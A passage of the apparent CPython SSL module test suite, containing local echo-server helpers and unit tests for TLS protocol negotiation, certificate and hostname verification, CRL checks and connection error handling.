#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
# TLS 1.3 perform client cert exchange after handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
